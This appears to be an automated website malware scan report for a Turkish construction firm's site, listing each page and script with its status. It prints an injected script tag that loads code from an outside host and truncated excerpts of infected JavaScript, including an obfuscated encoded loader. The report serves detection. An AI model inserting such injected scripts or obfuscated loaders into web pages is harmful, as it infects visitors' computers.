Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=obdinsaat.com.tr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://obdinsaat.com.tr/ | 200 OK Content-Length: 10365 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cljc.org.hk/6jb8wxpm.php?id=28239929"></script> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://obdinsaat.com.tr/script.js | 200 OK Content-Length: 10380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ document.getElementById("deneme").innerHTML="Haziran 2010'da baslanan NATO Kandahar Hava Ussu Entegre Cevre Kuvvet Koruma Yapilari Insaati Nisan 2012 itibariyle tamamlanarak teslim edilmistir.<br /><span style='font-style:italic; font-weight:bold'><a href='haberler.php' style='color:#6b92ba'>Devami icin tiklayiniz.</a></span>"; var totWidth=0; var positions = new Array(); $('#slides .slide').each(function Antivirus reports:
| ||
http://obdinsaat.com.tr/custom_scroller/jquery.min.js | 200 OK Content-Length: 84929 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-" b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof /*/a9a007*/ Antivirus reports:
| ||
http://obdinsaat.com.tr/custom_scroller/jquery-ui.min.js | 200 OK Content-Length: 6331 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) okln=String;asedna="spl" "i" "t";dag=window;vfwas=(1)?"0x":"123";dtk=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(yhmte){ccun=false;try{}catch(zqzzaa){ccun=21;}if(1){vqklfz="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq6bZq60Zq65Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6bZ Antivirus reports:
| ||
http://obdinsaat.com.tr/custom_scroller/jquery.easing.1.3.js | 200 OK Content-Length: 14428 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t b; retur Antivirus reports:
| ||
http://obdinsaat.com.tr/custom_scroller/jquery.mousewheel.min.js | 200 OK Content-Length: 7722 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){function d(b){var c=b||window.event,d=[].slice.call(arguments,1),e=0,f=!0,g=0,h=0;return b=a.event.fix(c),b.type="mousewheel",c.wheelDelta&&(e=c.wheelDelta/120),c.detail&&(e=-c.detail/3),h=e,c.axis!==undefined&&c.axis===c.HORIZONTAL_AXIS&&(h=0,g=-1*e),c.wheelDeltaY!==undefined&&(h=c.wheelDeltaY/120),c.wheelDeltaX!==undefined&&(g=-1*c.wheelDeltaX/120),d.unshift(b,e,g,h),(a.event.dispatch||a.event.handle).apply(this,d)}var b=["DOMMouseSc Antivirus reports:
| ||
http://obdinsaat.com.tr/custom_scroller/jquery.mCustomScrollbar.js | 200 OK Content-Length: 18814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($) { $.fn.mCustomScrollbar = function (scrollType,animSpeed,easeType,bottomSpace,draggerDimType,mouseWheelSupport,scrollBtnsSupport,scrollBtnsSpeed){ var id = $(this).attr("id"); var $customScrollBox=$("#" id " .customScrollBox"); var $customScrollBox_container=$("#" id " .customScrollBox .container"); var $customScrollBox_content=$("#" id " .customScrollBox .content"); var $dragger_container=$("#" id " .dragger_container"); var $dragger=$("#" id " .d Antivirus reports:
| ||
http://obdinsaat.com.tr/index.php | 200 OK Content-Length: 10365 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cljc.org.hk/6jb8wxpm.php?id=28239929"></script> | ||
http://obdinsaat.com.tr/kurumsal.php | 200 OK Content-Length: 11006 Content-Type: text/html | clean |
http://obdinsaat.com.tr/kalitepolitikasi.php | 200 OK Content-Length: 9360 Content-Type: text/html | clean |
http://obdinsaat.com.tr/js/jquery.lightbox-0.5.js | 200 OK Content-Length: 25519 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.lightBox = function(settings) { settings = jQuery.extend({ overlayBgColor: '#000', overlayOpacity: 0.5, fixedNavigation: false, imageLoading: 'img/lightbox-ico-loading.gif', imageBtnPrev: 'img/sol.png', imageBtnNext: 'img/sag.png', imageBtnClose: 'img/lightbox-btn-close.gif', imageBlank: 'img/lightbox-blank.gif', containerBorderSize: 10, containerResizeSpeed: 400, txtImage: Antivirus reports:
| ||
http://obdinsaat.com.tr/projeler.php | 200 OK Content-Length: 10955 Content-Type: text/html | clean |
http://obdinsaat.com.tr/ik.php | 200 OK Content-Length: 7785 Content-Type: text/html | clean |
http://obdinsaat.com.tr/haberler.php | 200 OK Content-Length: 7454 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: obdinsaat.com.tr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 May 2014 22:22:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: obdinsaat.com.tr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 May 2014 22:22:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: obdinsaat.com.tr
Referer: http://www.google.com/search?q=obdinsaat.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: obdinsaat.com.tr
Referer: http://www.google.com/search?q=obdinsaat.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.